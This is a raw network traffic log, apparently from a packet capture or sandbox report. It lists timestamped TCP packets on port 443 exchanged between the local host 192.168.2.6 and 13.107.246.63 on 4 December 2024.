                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876652002 CET4434985513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876869917 CET49855443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876918077 CET49855443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876918077 CET49855443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876944065 CET4434985513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.876956940 CET4434985513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.882132053 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.882206917 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.882306099 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.882576942 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:09.882591009 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:10.878609896 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:10.879262924 CET49857443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:10.879302025 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:10.879806042 CET49857443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:10.879815102 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203025103 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203094006 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203201056 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203460932 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203480959 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203496933 CET49851443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.203501940 CET4434985113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.207593918 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.207633018 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.207694054 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.207931995 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.207942963 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321191072 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321325064 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321412086 CET49857443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321645021 CET49857443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321660042 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321681976 CET49857443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.321687937 CET4434985713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.325586081 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.325640917 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.325725079 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.326076984 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.326092958 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.337923050 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.338690996 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.338711023 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.339206934 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.339211941 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.409432888 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.410062075 CET49859443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.410089970 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.410577059 CET49859443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.410586119 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.611742020 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.614495039 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.614527941 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.615006924 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.615012884 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.790115118 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793376923 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793427944 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793521881 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793576002 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793698072 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793711901 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793723106 CET49858443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.793735027 CET4434985813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.797363043 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.797418118 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.797494888 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.797703981 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.797719002 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.862968922 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866341114 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866432905 CET49859443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866491079 CET49859443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866507053 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866519928 CET49859443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.866525888 CET4434985913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.869833946 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.869879961 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.869971991 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.870132923 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:11.870142937 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.053992033 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.059914112 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.060064077 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.076447964 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.076509953 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.076529980 CET49860443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.076539040 CET4434986013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.080773115 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.080835104 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.080894947 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.081157923 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.081173897 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.941685915 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.942370892 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.942409039 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.942888975 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:12.942897081 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.119640112 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.120280981 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.120322943 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.120790005 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.120795965 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.384937048 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388061047 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388199091 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388430119 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388453007 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388465881 CET49861443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.388472080 CET4434986113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.393811941 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.393858910 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.393918991 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.395864964 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.395880938 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572163105 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572186947 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572319031 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572360039 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572768927 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572777987 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572803974 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.572973013 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.573008060 CET4434986213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.573050976 CET49862443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.576077938 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.576128960 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.576220989 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.576384068 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.576400995 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.590903044 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.591407061 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.591437101 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.594662905 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.594688892 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.681785107 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.682445049 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.682471037 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.682990074 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.682996988 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.873446941 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.874278069 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.874330997 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.875592947 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:13.875603914 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.135498047 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139410973 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139456034 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139473915 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139494896 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139537096 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139700890 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139719009 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139731884 CET49864443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.139738083 CET4434986413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.150939941 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.150990009 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.151043892 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.151540995 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.151552916 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.325908899 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.325997114 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.326073885 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.326426983 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.326453924 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.326472998 CET49865443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.326478958 CET4434986513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.329876900 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.329931021 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.330169916 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.330502987 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:14.330511093 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.217689991 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.218395948 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.218426943 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.218918085 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.218928099 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.369432926 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.374593019 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.374625921 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.375560045 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.375571012 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662019014 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662054062 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662112951 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662326097 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662694931 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662724972 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662736893 CET49866443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.662744045 CET4434986613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.666300058 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.666348934 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.666436911 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.666613102 CET49870443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.666623116 CET4434987013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.821209908 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824460983 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824577093 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824661016 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824695110 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824713945 CET49867443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.824719906 CET4434986713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.828531981 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.828593969 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.828813076 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.829060078 CET49871443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:15.829068899 CET4434987113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.009089947 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.009829998 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.009855986 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.010370016 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.010380030 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.074220896 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.094805002 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.094867945 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.095407963 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.095417976 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.411920071 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.411953926 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412014008 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412101984 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412147045 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412398100 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412419081 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412431002 CET49863443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.412436962 CET4434986313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.415843010 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.415896893 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.416130066 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.416368008 CET49872443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.416374922 CET4434987213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.469578028 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.469609022 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.469715118 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.469738007 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.469990969 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.470001936 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.470020056 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.470186949 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.470216990 CET4434986813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.470253944 CET49868443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.473763943 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.473817110 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.473934889 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.474107981 CET49873443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.474114895 CET4434987313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.516871929 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.516948938 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.516999006 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517074108 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517115116 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517230988 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517261982 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517276049 CET49869443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.517288923 CET4434986913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:01:16.549452066 CET49874443192.168.2.613.107.246.63
